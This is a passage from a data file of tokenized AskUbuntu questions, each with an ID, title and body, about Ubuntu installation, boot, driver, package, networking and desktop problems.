hpfs/ntfs/exfat /dev/sda3 341301248 399894527 29296640 83 linux /dev/sda4 399896574 625141759 112622593 5 extended /dev/sda5 399896576 415518719 7811072 82 linux swap / solaris /dev/sda6 415520768 625141759 104810496 83 linux john @ john-hp-g71-notebook-pc : ~ $ sudo parted -l model : ata hitachi hts72323 ( scsi ) disk /dev/sda : 320gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 210mb 209mb primary ntfs boot 2 210mb 175gb 175gb primary ntfs 3 175gb 205gb 30.0gb primary ext4 4 205gb 320gb 115gb extended 5 205gb 213gb 7999mb logical linux-swap ( v1 ) 6 213gb 320gb 107gb logical ext4
239556	will nexus 7 with ubuntu run eclipse and fdt and compile out via otg usb to another android device ?	very specific question i know , but has anyone tried eclipse with fdt on the nexus 7 port of ubuntu ? i see that eclipse should be armhf ( arm processor compiled ) , so , any chance the adb ( android debug bridge ) packaging works via otg ( on the go ) usb to another android device ? just thinking if the n7 could be used as a basic dev tool .
239560	problem binding a shortcut to a function / multimedia key	i want to connect a batch script to a shortcut . when i bind it under system settings > keyboard > shortcuts it works with every key , except my brightness keys from my external apple keyboard . the brightness keys are recognized in showkey with the keycode 224 and 225. xev output : focusout event , serial 41 , synthetic no , window 0x4000001 , mode notifygrab , detail notifyancestor focusin event , serial 41 , synthetic no , window 0x4000001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 41 , synthetic no , window 0x0 , keys : 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 any suggestions what i can do ?
239561	are ubuntu packages ( deb-files ) only md5sum secured ?	introductory background to the question below # # # ( so the question is more usable to more people ) inside of an ubuntu/debian-style package ( *.deb file ) there is a file named /debian/md5sums which has a content of this form : 212ee8d0856605eb4546c3cff6aa6d35 usr/bin/file1 4131b66dc3913fcbf795159df912809f path/to/file2 8c21de23b7c25c9d1a093607fc27656a path/to/file3 c6d010a475366e0644f3bf77d7f922fd path/to/place/of/file4 as i assume this file will be used to check that the files which come with the package have not been corrupted somehow . since the file is called `/debian/md5sums '' i assume the hexnumber before the path+filename is the md5 message-digest algorithm hash of the package 's files . now everybody interested knows that the md5 hash has been broken already long time ago . therefore it is totally possible to change the content of a file in the package ( e.g maliciously ) and still have the file having the same md5-hash ( see for instance prove of concept `` predicting the winner ... . '' ) . question bearing in mind the information above i want to know the following : *assuming i install a package in my ubuntu system . is the debian/md5sums the only means to make sure the data has not been tampered with ? * answering the question i think it could help to figure out the following : are the deb packages as a whole also hashed ( hashvalues made for ) so that there is another way to make safe the files received are `` safe '' / '' untampered '' if there are other ways then the debian/md5sums file to ensure integrity , what is the file included in the *.deb packages anyhow ? does ubuntu use hashes for repository/package-system that are `` less broken '' than sha-1 and md5 ? which unfortunately i do not know either . any reponse which can shed light on the question ( or even only a subquestion ) is very welcome update ( 1 ) https : //help.ubuntu.com/community/repositories/ubuntu # authentication_tab seems to indicate that there is ( as i hoped for ) some public/private gpg key going on ( to keep the repos and package systems ) safe from attacks . the information at the linked location is not very much though . it tells almost nothing about the security aspect of the package-system . anyhow i assume the link already indicates that the answer for the question will be `` no -at least the deb packages from the repo - are also secured by ... . `` . hope somebody has some insights to use for an answer here . ( 2 ) this question seems to be also about the topic of `` security '' in ubuntu package system . so i just add it here so its ad hand if somebody strives to figure the question out : why are the proposed badsig ( on apt-get update ) fixes secure ?
239562	installing swagger-ui	i 'd like to use swagger , the api-documentation tool on my ubuntu 12.04 system . on a windows machine i just open the index.html file with firefox and put in the address that i want the swagger-ui to work with , but on ubuntu it seems like it is n't working properly - i can see that the swagger-ui is n't even trying to fetch the resources page . has anyone succeeded in doing this ? did you install coffeescript and handlebars , or do something else ?
239564	how to create and export a vmware image using vmbuilder	i 've been using vmbuilder to build kvm images as such : vmbuilder kvm ubuntu \ -v \ -- suite=precise \ -- libvirt=qemu : ///system \ -- arch=amd64 \ -- cpus=2 \ -- mem=1024 \ -- swapsize=1024 \ -- rootsize=10240 \ -- flavour=server \ -- hostname=hostnamehere \ -- ip=x.x.x.x \ -- mask=x.x.x.x \ -- net=x.x.x.x \ -- bcast=x.x.x.x \ -- gw=x.x.x.x \ -- dns='x.x.x.x x.x.x.x ' \ -- bridge=br0 \ -- mirror=http : //archive.ubuntu.com/ubuntu \ -- components='main , universe ' \ -- addpkg=openssh-server , acpid \ -- user=username \ -- pass=password \ -- dest=/vmname \ -- tmpfs=- however recently i had a request to build a vmware image and although i have done such in the past using several vmware tools i have recently read that this can also be achieved using vmbuilder , how would i go about creating a vmware image that i can give to my client and he can import to vmware ? also i 'd need to add a second disk to the image , how can i add another vmdk ?
239565	how to make a program start in terminal after some time	i want to make a shortcut that will run utorrent every time i click it without me doing all the commands in terminal every time ... i created a script the run cd my utorrent folder and then do the ./utserver . after that i need to make my firefox open in u torrent link `` http : //localhost ... etc '' . but my problem is that ./torrent do n't finish for about 2-3 mins although in that time if i manually open the link for u torrent in firefox it starts fine so i need a command that will open this link in firefox after about 4-5 secs even if ./utorrent ( command ) was n't finished ... ( but not instantly after started because utorrent wont start ) does anyone have an idea how can i do this ? thanks in advance .
239566	full screen or more visible skype , pidgin , empathy notifications ?	i work in a shared office and i have the heaphones plugged in in order not to bother my colleagues with the poping sounds of chats and incoming calls . the problem is that i miss most of my calls and chats because the current alerts are just to hard to notice . is there a way to make ... the full screen flicker , or to bring up an obnoxious message right in the middle of the screen , or a full status bar blink while not focused on the messaging-calling app so that i will not miss the calls ? i 've gone through the full dconf-editor without finding anything helpful . there may be a good lead here : how to make skype use notify-osd ? but i do n't know how to take advantage of it to change the notifications . there 's a usb key with changing lights project but it does not work with linux . besides , why add another hardware piece when you can just put it in the interface you are looking too ? this is not a whitelisting problem , all my apps show in the tray . ps : i 've done my research in askubuntu and not found anything . if you know and think this question is a duplicate , please include the original question before closing this one so that i can check it and that others can find it in the future . i appreciate your work and that you keep askubuntu tidy , but it is very frustrating to arrive to questions that are closed because they are duplicates and not have a link to the question they are a duplicate of .
239570	how do i insert page numbers in libreoffice ? microsoft-office style	i have fully switched from ms office suite to libreoffice however one thing i really miss about office is how it handled page numbering . all i had to do was just click on the insert bar and simply choose page number option and then voila office would automatically insert the page numbers in the position i want it to be . how can i get such functionality in libreoffice
239576	invalid efi when trying to boot windows	when i try to boot into windows i get 'invalid efi file path ' . i can still get into windows by going into bios and making my other hard drive the boot priority , which is a pain . i 've since installed windows 8 and the issue is the same . i just ran boot-repair and this is the output : http : //paste2.org/p/2726047 it also says something like 'unable to find command drivemap ' . which it did not a couple of weeks ago when i first had the issue . thanks .
239578	ubuntu : xorg - can not install controller configuration crt 262	i have a server running under ubuntu with no hardware display connected . basic display resolution in this case is $ xrandr -q screen 0 : minimum 640 x 480 , current 800 x 600 , maximum 800 x 600 default connected 800x600+0+0 0mm x 0mm 800x600 61.0* 640x480 60.0 but first is a bit low for me - i want to set 1024x768 to use teamviewer and vnc comfortable . so i have tried to add new resolution : $ cvt 1024 768 60 # 1024x768 59.92 hz ( cvt 0.79m3 ) hsync : 47.82 khz ; pclk : 63.50 mhz modeline `` 1024x768_60.00 '' 63.50 1024 1072 1176 1328 768 771 775 798 -hsync +vsync than check and add mode : $ xrandr -q screen 0 : minimum 640 x 480 , current 800 x 600 , maximum 800 x 600 default connected 800x600+0+0 0mm x 0mm 800x600 61.0* 640x480 60.0 1024x768_60.00 ( 0x120 ) 63.0mhz h : width 1024 start 1072 end 1176 total 1328 skew 0 clock 47.4khz v : height 768 start 771 end 775 total 798 clock 59.4hz xrandr -- addmode default 1024x768_60.00 uadm @ spravka : ~ $ xrandr -q screen 0 : minimum 640 x 480 , current 800 x 600 , maximum 800 x 600 default connected 800x600+0+0 0mm x 0mm 800x600 61.0* 640x480 60.0 1024x768_60.00 59.4 so now i can pick 1024x768 in my display configuration gui.. but it do n't works . someone can tell me where is a problem ? ps : when i connect hardware display - it sets normal real resolution such as 1280x960 automatically . thanks for help .
239579	laptop hdd encrypted with lvm full disk encryption	if i have full disk encrypted my laptop which has ubuntu 12.04 , will the thief be able to extract my files from the swap partition ? i am assuming s/he will not be able to extract anything from the main partition without doing some form of bruteforce code breaking attach ?
239582	issue with installing with wubi	i have installed ubuntu with wubi , dual booting with windows xp . the installation is completed and the boot to ubuntu is successful to the login screen . however , when i input the password , it takes me to a blank screen with only the wallpaper displayed . there is no menu , no left click menu either ; there is nothing can be done at this stage . the only way to leave is through ctrl + alt + delete . the boot to winxp can be done as normal . please help advise what is the problem and how to solve ?
239583	is there a shortcut to restore desktop focus ?	perhaps i 'm missing something , but i 've recently started using unity on ubuntu 12.04 and i 'm getting used to it . but , whenever i start a program and then exit the program i must click on the desktop , otherwise the keyboard shortcuts to move between workspaces ( ctrl+alt+cursor key ) do n't work . is there a keyboard shortcut to restore the focus to the ubuntu desktop or must i use the mouse ?
239586	music lags/ hiccups when i seek using any banshee or rhthmbox	i have been using linux for years now and this has never been a problem . but on my latest system [ ubuntu 12.10 with gnome classic session ] it has been.. hiccuping is the best i can describe it . it happens whenever i seek on any music player . i click anywhere on the seek bar and it will play , then hiccup back about 1-2 sec and play normally . i seek a lot when using my computer so this is ruining my entire experience . i have searched and searched but have found nothing . my library is mp3 files btw . any help would be appreciated.. it worked fine on this system about a month ago .
239587	piping multiple audio files to totem media player	my gf likes the beatles so i placed a couple of tracks on my harddisk ... beatles - here comes the sun.mp3 beatles - if i fell.mp3 beatles - tell me why.mp3 beatles - things we said today.mp3 ... now from terminal - i can easily enqueue a track to my media player totem totem -- enqueue `` beatles - here comes the sun.mp3 '' but sometimes my gf likes to give me smoochies , thus , keeping me busy from spending all day enqueueing tracks one by one . is there a way to enque multiple tracks with a single command ? ... it does n't have to be simple ... but she thinks single command lines are so hot , resulting in more smoochies : ) also , please presume that the files could be scattered in subdirectories . i 've tried the following but it did n't work ... totem -- enqueue `` $ ( find -iname `` *beatles* '' ) ''
239589	how do i determine whether bumblebee is working as expected ?	i followed the instructions at https : //wiki.ubuntu.com/bumblebee sudo add-apt-repository ppa : bumblebee/stable sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update instead of installing the proprietary nvidia drivers , via : sudo apt-get install bumblebee bumblebee-nvidia linux-headers-generic i did : sudo apt-get install -- no-install-recommends bumblebee linux-headers-generic how do i determine that power savings mode is active and that my dedicated gpu is n't running ? one thing that bugs me is that if i go to system settings - details - graphics . driver is shown as unknown .
239590	how do i wake from sleep using a bluetooth keyboard	i have a mac book pro , and a henge dock . the dock is nothing more then a holder that allows you to easily plug in a few devices so you can `` dock '' your mbp . i also have a apple wireless keyboard . the keyboard is bluetooth . the keyboard works fine `` normally '' but the problem is when i close the lid on my mbp the laptop goes to sleep ( this can not be prevented ) i place the laptop in the dock ( with the lid closed ) and i can not wake from sleep ( i assume because no bluetooth ) . if i use my game pad to wake the device from sleep , i get the lock screen password prompt , however i can not actually enter anything because the bluetooth keyboard is not connected . so how can i wake the mac book pro from sleep using a bluetooth keyboard ( the apple wireless keyboard ) , or failing that , force it to reconnect when the machine resumes so i can type my password ? here are my hardware details . mac book pro 6.2 ( i know that does n't normally work but it 's a closed hardware platform ) bus 001 device 008 : id 050d:0017 belkin components b8t017 bluetooth+edr 2.1 bus 001 device 007 : id 05ac:8218 apple , inc. bluetooth host controller linux version linux macbook 3.5.0-22-generic # 34-ubuntu smp ubuntu 12.10 what i have done : paired my apple wireless keyboard with ubuntu . what i expect : when i mash a key on my apple wireless keyboard the system wakes from sleep . what happens : when i mash a key on my apple wireless keyboard ; nothing ... .. what i expect from a acceptable answer : a way to make it so when i mash a key my apple wireless keyboard my computer wakes from sleep , and i can continue on with my computing day . of note : i usually hate seeing this and saying it , but ... . it works in mac os x and in windows , so i know the hardware is capable of doing this .
239591	synaptics touchpad moves a few dots when tapping	normal mouse movement is fine but when i try to tap the touchpad the pointer often moves away a few dots . which is kind of annoying , because sometimes the cursor ends up where its not supposed to be . this behaviour does not occur with windows 7 ( i am dual booting ) . i am thinking of installing a newer version of the synaptics touchpad driver for ubuntu . anyone know how this can be done ? second , any other approaches i should consider ?
239598	external mount ... . is it possible	how can i mount ubuntu to my external hdd . i do n't want to mess with my computer 's hard drive . i am taking a class for linux and i hate dual boot .
239600	why does n't rc.local run all my commands , and what can i do about it ?	i have the following rc.local script : # ! /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . sh /home/incero/startup_script.sh /bin/chmod +x /script.sh sh /script.sh exit 0 the first line , startup_script.sh actually downloads the script.sh file to /script.sh referred to in the third line . unfortunately , it appears that it is not making the script executeable or running the script . running the rc.local file manually after having started works perfectly . can chmod not be run at startup or something ?
239604	how to switchback to user with uid 1000 in shellscript	i have created the following shell script . # ! /bin/bash ... # cleanup sudo update-rc.d mysql defaults sudo update-rc.d apache2 defaults ln -s /etc/drupal/7 /home/ $ user/drupal exit now i 'd like to create the symbolic link for the user with uid 1000 but not for the root user . what code whould help ? thank you for any ideas josh
239605	why do i get `` connection refused '' errors connecting to a server via ssh ?	i 've installed ubuntu 12.04.1 lts on it with the lamp stack . i can ping it but when i try to connect to it the server ca n't be found . when i try to connect with winscp i get the error network error : connection refused . i 've installed the openssh-server and openssh-client packages but still can not connect .
239607	xampp oracle 11g	i have downloaded xampp for linux . have installed it . it works fine . but i have problem with oci8 extension . i have downloaded oracle instant client for linux and extracted it to /opt/lampp/lib . then i called /opt/lampp/lampp oci8 when it promted for instant client directory i entered /opt/lampp/lib but it gives me this error : ca n't find libclntsh.so . sorry . even if that file is in that directory it continues giving me that error . can anyone guide me with right installation ? p.s : i have no installed oracle database server on my local machine . i would like to use it for remote connection .
239621	youtube web app not working in ubuntu 12.10	i just installed youtube web app in ubuntu using this command , sudo apt-get install unity-webapps-youtube but i can not make it working or i do not find any youtube icon on the dash .
239622	how do i install signal so i can install octave ?	anyone can help me with this error ? octave:4 > pkg install signal-1.2.0.tar.gz error : the following dependencies where unsatisfied : signal needs optim > = 1.0.0 signal needs specfun > = 0.0.0 signal needs control > = 2.2.3 signal needs general > = 1.3.2 octave:4 > pkg install optim-1.2.2.tar.gz error : the following dependencies where unsatisfied : optim needs miscellaneous > = 1.0.10 optim needs struct > = 1.0.10 octave:4 > pkg install struct-1.0.10.tar.gz make : /usr/bin/mkoctfile : command not found make : *** [ fields2cell.oct ] error 127 'make ' returned the following error : make : entering directory `/tmp/oct-fdbs5k/struct-1.0.10/src' /usr/bin/mkoctfile -s fields2cell.cc make : leaving directory `/tmp/oct-fdbs5k/struct-1.0.10/src' error : called from `pkg > configure_make ' in file /usr/share/octave/3.6.2/m/pkg/pkg.m near line 1391 , column 9 error : called from : error : /usr/share/octave/3.6.2/m/pkg/pkg.m at line 834 , column 5 error : /usr/share/octave/3.6.2/m/pkg/pkg.m at line 383 , column 9 i need to install signal package , but i have to download other to work from i have noticed but it gets stuck when installing struct package . @ edit the same error when trying to install misc~ package . octave:5 > pkg install miscellaneous-1.2.0.tar.gz error : the following dependencies where unsatisfied : miscellaneous needs general > = 1.3.1 octave:5 > pkg install general-1.3.2.tar.gz make : /usr/bin/mkoctfile : command not found make : *** [ __exit__.oct ] error 127 'make ' returned the following error : make : entering directory `/tmp/oct-ca6o4u/general/src' /usr/bin/mkoctfile __exit__.cc make : leaving directory `/tmp/oct-ca6o4u/general/src' error : called from `pkg > configure_make ' in file /usr/share/octave/3.6.2/m/pkg/pkg.m near line 1391 , column 9 error : called from : error : /usr/share/octave/3.6.2/m/pkg/pkg.m at line 834 , column 5 error : /usr/share/octave/3.6.2/m/pkg/pkg.m at line 383 , column 9 @ edit additional info : octave:6 > which mkoctfile `mkoctfile ' is a function from the file /usr/share/octave/3.6.2/m/miscellaneous/mkoctfile.m i have no idea what to do..
239624	how to `` prioritise '' multiple network connections	i am currently using a mobile internet connection , however i wish to mount a drive via a wifi connection . however , whenever i do so , the mobile internet connection appears to be neglected in favour of the wifi connection , which has no internet access . therefore , i am unable to use the internet whilst using the wifi-based mounted drive and vice versa . how can i `` prioritise '' the mobile internet network connection for internet access related tasks when both network types are in use ?
239629	external hard disk damaged | not detecting	i wanted to install ubuntu 12.04 on my external 80 gb hard disk . during installation i selected `` something else '' option . i formatted the hard disk there with `` free space '' as file system . as there was a power down , my computer switched off . now , its not detecting my hard disk anymore . though my bios shows my external hard disk is connected , but neither windows nor ubuntu ( in the `` something else '' part ) detects my hard disk . please help .
239630	( /proc/kcore ) what is this magical file which can somehow take up 140.7 tb on a 500 gb hdd ?	i was cramped for hard drive space , so i was looking for a place where some files might have been duplicated during a restore . the culprit turned out to be root trash , but this stuck out like a sore thumb . this page says that the file is an alias for my memory and the size of the file is the same as the amount of ram that i have . now that ca n't be entirely true , because i only have 4.0 gb of ram . what is going on here ?
239631	how can i watch the current connections on my apache webserver ?	i am hosting quite a lot of virtual hosts using apache in a basic lamp set up with the help of webmin/virtualmin . i am looking for a top-like tool in which i can monitor current connections . the virtual hosting part seems to be giving me trouble here . here 's what i 've tried : netstat - i can see the connections , but they show me as if they 're all using my primary domain , e.g . mydomain.com : www . iftop - i like it a lot , but similar downside as netstat : does not show the virtual host . apachetop - seems to be showing not information for all my virtual hosts . i 'm logging to separate custom log files , which i 'm suspecting is the cause for why it does n't work . ntop , darkstat , mrtg , bwm-ng , iptraf - not working either . so , basically , i 'm looking for something similar to the current output of netstat , but to include the virtual host the request is for , e.g . : avirtualsite.com : www .
239636	why does mkfs fail with 'read-only file system ' ?	i 'm trying to format a pen drive using mkfs , but it fails with : read-only file system . here is what i have tried so far : $ sudo hdparm -r0 /dev/sdb1 /dev/sdb1 : setting readonly to 0 ( off ) readonly = 0 ( off ) $ umount /dev/sdb1 $ sudo chmod 777 /dev/sdb1 $ sudo mkfs -t vfat /dev/sdb1 mkfs.vfat 3.0.13 ( 30 jun 2012 ) mkfs.vfat : unable to open /dev/sdb1 : read-only file system what should i do ?
239637	bought a windows8 system from store , installed ubuntu windows installer , but it fails to start	i bought a windows 8 computer . i then installed ubuntu-windows-installer-12.10 . when i boot the system , i see a screen with two options to choose from : windows8 ( which works fine and i can start windows with no problem . ) ubuntu ( which does not work . i get an error message : windows failed to start . a recent hardware or software change might be the cause . ) what is wrong and how can i fix this ? i really appreciate your help .
239638	dvd pausing - buffer i/o error	this is not the first time that it happens . when i 'm watching a dvd on ubuntu , after sometime , it starts pausing . the cpu goes 100 % ( wa ) . i get these messages on syslog : sr 0:0:1:0 : [ sr0 ] result : hostbyte=did_ok driverbyte=driver_sense [ sr0 ] sense key : illegal request [ current ] [ sr0 ] add . sense : illegal mode for this track sr 0:0:1:0 : [ sr0 ] cdb : read ( 10 ) : 28 00 00 1a fb 78 00 00 40 00 [ 10593.929038 ] end_request : i/o error , dev sr0 , sector 7073248 [ 10593.929044 ] quiet_error : 56 callbacks suppressed [ 10593.929047 ] buffer i/o error on device sr0 , logical block 1768312 [ 10593.929053 ] buffer i/o error on device sr0 , logical block 1768313 [ 10593.929059 ] buffer i/o error on device sr0 , logical block 1768314 [ 10593.929063 ] buffer i/o error on device sr0 , logical block 1768315 [ 10593.929067 ] buffer i/o error on device sr0 , logical block 1768316 [ 10593.929070 ] buffer i/o error on device sr0 , logical block 1768317 [ 10593.929085 ] buffer i/o error on device sr0 , logical block 1768318 [ 10593.929088 ] buffer i/o error on device sr0 , logical block 1768319 [ 10593.929092 ] buffer i/o error on device sr0 , logical block 1768320 [ 10593.929095 ] buffer i/o error on device sr0 , logical block 1768321 for example , today i was watching a movie on totem and , after 1 hour , i recieved this error : could not read dvd . this may be because the dvd in encrypted and a dvd decryption library is not installed . i 've already tried to use vlc and totem . it happens on both . i 'm using ubuntu 12.04 64-bits - intel core 2 duo 1.86ghz - 2mb ram - dvd-rw lg .
239641	how to dual boot ubuntu 12.04 and windows 7	i am building a computer and would like to dual boot these two os's i have no idea really what i 'm doing so please be patient and bare with me ! this will be really helpful , thank you you should also know i have been using a mac previously and i have barely any experience with either windows or ubuntu !
239647	how can i give myself permission to edit files in /var/www without having to use the root account or sudo ?	permissions mystify me . i 'm worried about compromising the security of my folder , too , since it 's public .
239648	gnome tweak tool wo n't start with user themes in gnome-shell	ca n't launch gnome tweak tool when the user themes extensions is enabled . when i tried from terminal , the output was : petr @ sova : ~ $ gnome-tweak-tool ( gnome-tweak-tool:6475 ) : glib-gio-error ** : settings schema 'org.gnome.shell.extensions.user-theme ' is not installed trace/breakpoint trap ( core dumped ) gnome tweak tool works correctly without user themes . ubuntu 12.04 , gnome-shell 3.4.1 relevant ( closed ) question : gnome-tweak-tool does n't start
239650	laptop wont boot	i made a live usb and used it to boot into ubuntu 12.10 on my laptop after using it a bit i ran the installation and once it finished it told me to restart so i did and i am now stuck at the startup screen where i can select boot device or to enter bios . it does not progress any further than this and will not load either of these options when i press the key to use them . i have tried rebooting multiple times with and without the usb in ( read it sometimes puts the boot files on it ) i have tried taking the battery out and unplugging it i do not know what to do anymore and i am new to this so i am wondering if the laptop is dead now or what i will need to do to fix this . it is a lenovo g560 i found a way around the issue by putting the hard drive into another computer and installing it again . i am guessing the installation may have received an error or something the first time through but it worked the second time through
239657	git gui here script	i want to open git gui in any folder using context menu . it something like cd < path to folder > git gui in terminal . how to add this functionality into context menu ?
239661	set samsung s3370b as usb modem ?	back when i had a windows pc ; i used an application called `` samsung kies '' with my s3370b mobile phone ( not smartphone ) . a feature that was included in the software , was the ability to use the phone as a modem for mobile internet . so my question is , whether or not i can use samsung kies on ubuntu to use that feature , or if there is a better alternative way . thanks ! : )
239662	how to install anjuta 3.6 ide - 12.04 with kde	i have downloaded the file anjuta-3.6.1.tar.xz from here -- > http : //projects.gnome.org/anjuta/ now i would like to install it but i do n't know how . i have looked at the install.txt and i have done cd in the program directory and then this command : ./configure it worked , and after that it says to give make but it does n't work . could you help me ? here is the output $ ./configure checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... gawk checking whether make sets $ ( make ) ... yes checking whether to enable maintainer-specific portions of makefiles ... yes checking whether make supports nested variables ... yes checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking for style of include used by make ... gnu checking dependency style of gcc ... gcc3 checking how to run the c preprocessor ... gcc -e checking for flex ... no checking for lex ... no configure : error : flex is required i think i miss also some listed libraries at http : //projects.gnome.org/anjuta/downloads.html , for example gtk+ . i ca n't find some of these libraries .
239664	only thing shown is background	i got ubuntu for the first time yesterday and it was working great so when i turned my computer off and went to bed when i got on in the morning all 's it would show is the background after i logged in , no icons , quick launch things , stuff at the top , all 's i can see is the background , and i ca n't even right click . since i 'm new to ubuntu i 'm still getting use to it but can someone help me out ? oh and i gave it about 20 minutes before turning off waiting ...
239666	why does software center not start and updates fail ?	software centre does n't even open . when i want to update software i get these errors : an unresolvable problem occurred while initializing the package information . could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : e : malformed line 60 in source list /etc/apt/sources.list ( dist parse ) same thing in terminal @ ubuntu : ~ $ sudo apt-get update e : malformed line 60 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . what to do ?
239668	how do i launch gnome-terminal inside a specified directory ?	i created bash script to open terminal in current directory because of an issue with nautilus-open-terminal . the problem is , this one does n't work gnome-terminal -- working-directory = `` $ nautilus_script_current_uri '' but this one works gnome-terminal cd `` $ nautilus_script_current_uri '' question : what 's wrong with first one ?
239669	ubuntu not appearing in grub menu after installing alonside mint	i have been using mint may 13 for several months , but i wanted to install ubuntu 12.10 also . i ran the ubuntu live cd and `` installed alongside '' . everything appeared to install correctly , but when i boot up , it only recognizes mint and windows 7 ( which is on sdb , while mint and ubuntu are on sda , with sda first in the boot order . mint and win 7 still work fine . and i examined the partitions on sda and ubuntu appears to be installed properly . is there a step or setting i missed or need to take for grub to recognize ubuntu at boot ? thanks
239672	how do i automatically create links to directories ?	what is the easiest/quickest way to share files among different users ? i would like each user to have access to the same music and pictures directories . creating symbolic links seems tedious as i would have to manually add them after i created each user . is there a way to automatically create links to these directories for each user ?
239673	gparted - increase ext4 partition using unallocated space	this is a screenshot of my partitions . i want to extend the /dev/sda5 partition to all unallocated space ( 27.03 gb ) . i tried unmount the ext4 partition to increase it but i got this error message . the partition could not be unmounted from the following mount points : / most likely other partitions are also mounted on these mount points . you are advised to unmount them manually .
239684	playonlinux does n't see my cdrom	trying to install diablo 2 with playonlinux and after creating the virtual drive and choosing to install with cdroms , disk in , click next and : error : unable to find cd-rom . please help . i also need to be walkthrought the process of installing diablo 2 after fixing the cdrom problem . thanks . jérémie
239687	encrypted home directory not auto mounting with .profile	i have ubuntu 12.04 server edition with home directory encryption enabled . logging in locally automatically decrypts and mounts my home directory and loads my zshrc . but logging in via ssh just drops me in the bare home directory without decrypting and mounting my home dir . this is what i see 3014658 dr-x -- -- -- 2 david david 4096 jan 10 14:20 . 3014657 drwxr-xr-x 5 root root 4096 jan 10 10:22 .. 3014666 lrwxrwxrwx 1 david david 56 jan 7 18:42 access-your-private-data.desktop - > /usr/share/ecryptfs-utils/ecryptfs-mount-private.desktop 3014662 lrwxrwxrwx 1 david david 31 jan 7 18:42 .ecryptfs - > /home/.ecryptfs/david/.ecryptfs 3014663 lrwxrwxrwx 1 david david 30 jan 7 18:42 .private - > /home/.ecryptfs/david/.private 3015474 -rwxrwxrwx 1 david david 35 jan 10 14:20 .profile 3014665 lrwxrwxrwx 1 david david 52 jan 7 18:42 readme.txt - > /usr/share/ecryptfs-utils/ecryptfs-mount-private.txt 3017327 -rw -- -- -- - 1 root root 623 jan 10 10:40 .viminfo i created a ~/.profile with the permissions and ownership above . it 's contents say to mount my encrypted home and cd into it to refresh my shell . /usr/bin/ecryptfs-mount-private cd it does n't seem to be executing on ssh login . when i run ecryptfs-mount-private manually , i 'm prompted for a password . perhaps this is what 's preventing the automatic mounting ?
239688	how to force any program to close ?	sometimes programs tell me i ca n't start it because there is already another instance of it running . best example would be firefox and chromium , but this problem accounts for many applications . i can not find the applications pid in the running processes . how to kill all running instances of a program , e.g . firefox ? i tried : ps ax | grep firefox but everything i can find is : 8193 ? rl 0:08 /usr/lib/firefox/firefox i tried : kill 8193 but i get : process not found actually , even when firefox is running accurately , i can not find its instances in ps . what did i miss ?
239690	how do i get ubuntu to recognize/mount my intel 180 gb ssd on /dev/sdb ?	i have installed intel 330 series 180 gb ssd in my dell tower inspiron 530s . the bios sees this hd as sata # 5 . however my operating system is ubuntu 12.04.1 lts and no other os on computer . gparted identifies an unrecognized , unallocated partition of correct size on /dev/sdb . i was able to get gparted to put dos file system in place ? but i am unable to do anything with the ssd . i assume that it wants to be mounted to be recognized . gparted says it does not know where/how to do that . your help would be greatly appreciated . thanks , ray
239693	unity launcher disappeared - why ?	basically , when i press super it looks like this : as you can see , the launcher is missing . i have no idea why this happened . i have already tried the following : removing folders : ~/.compiz-1 and ~/.config/compiz-1 and running unity -- reset , reinstalling unity with sudo apt-get install -- reinstall unity , reverting all sidebar settings to defaults in ubuntu tweak , checking that the unity plugin is enabled in ccsm ( as described here ) , restarting the system . none of these helped . do you have any other ideas ? how can i find out what happened ?
239697	instaling ubuntu 12.10	i can not run ubuntu 12.10 on my lenovo s206 , it keep asking me to have a cd recorder to install and copy ubuntu . what im doing wrong . please help .
239698	how do i add a custom context menu for 'git gui ' in nautilus ?	what i want to achieve is to get a `` git gui here '' item in the context menu of nautilus ( file manager ) . it should this easy job i would do in a terminal : cd `` path/to/current/folder '' git gui # < -- this pops up a gui for git in a new window i 'm using nautilus actions configurator application to achieve this as shown below . it does show the custom context menu , yet i would have expected it to also work this way , but it does n't . upon hitting my button it just opens git gui without actually run in the working directory of nautilus is in . what am i doing wrong about this current working directory ?
239702	preventing gnome-shell from constantly freezing	whenever i move/copy/rename a file using nautilus , or download a file using firefox , gnome-shell freezes for about 5 to 10 seconds . only the mouse is still responsive , but i ca n't click or manipulate anything . this is immensely frustrating . i 'm seeing no explicit error messages . i 'm using ubuntu 12.10 . is there anything i can do to fix this ?
239706	ubuntu 12.10 - problems with secondary monitor on left .	i 've got a monitor connected using display port to my laptop . when i switch secondary monitor to be on left ( by default it 's on right ) and i turn off the monitor , all apps from primary monitor disappear ( they go to secondary monitor which is turned off : ) ) . the workaround is to put everything in secondary monitor and turn of the screen ( using `` displays '' app ) . it 's really annoying and maybe some of you guys know to fix that . it looks for me as a bug , but maybe there is some solution..
239707	ideapad z580 wo n't boot kernels above 3.2.0-32	i 'm running ubuntu 64 bit 12.04.1 lts . i see either a blinking cursor or a black screen if i try to boot all kernels beginning at 3.2.0-33 and later . safe mode fails for those kernels as well . however , my system boots fine and runs fine on kernel 3.2.0-32 as well as kernels previous to that . i have seen other z580 users with this same problem on other forums . thank you .
239708	what are `.mojo.run` files ? should i choose one over a tarball ?	i 'm about to download dungeon defenders from the humble bundle website , and i am presented with two options : a .tar.bz2 tarball and a .mojo.run mojosetup file . which should i choose ? what are the benefits of a .mojo.run file ? how easy is it to uninstall a mojosetup file ? how well integrated is it with ubuntu ? i 'm interested in hearing a general answer about .mojo.run files , the dungeon defenders game was just an example and not the core of my question .
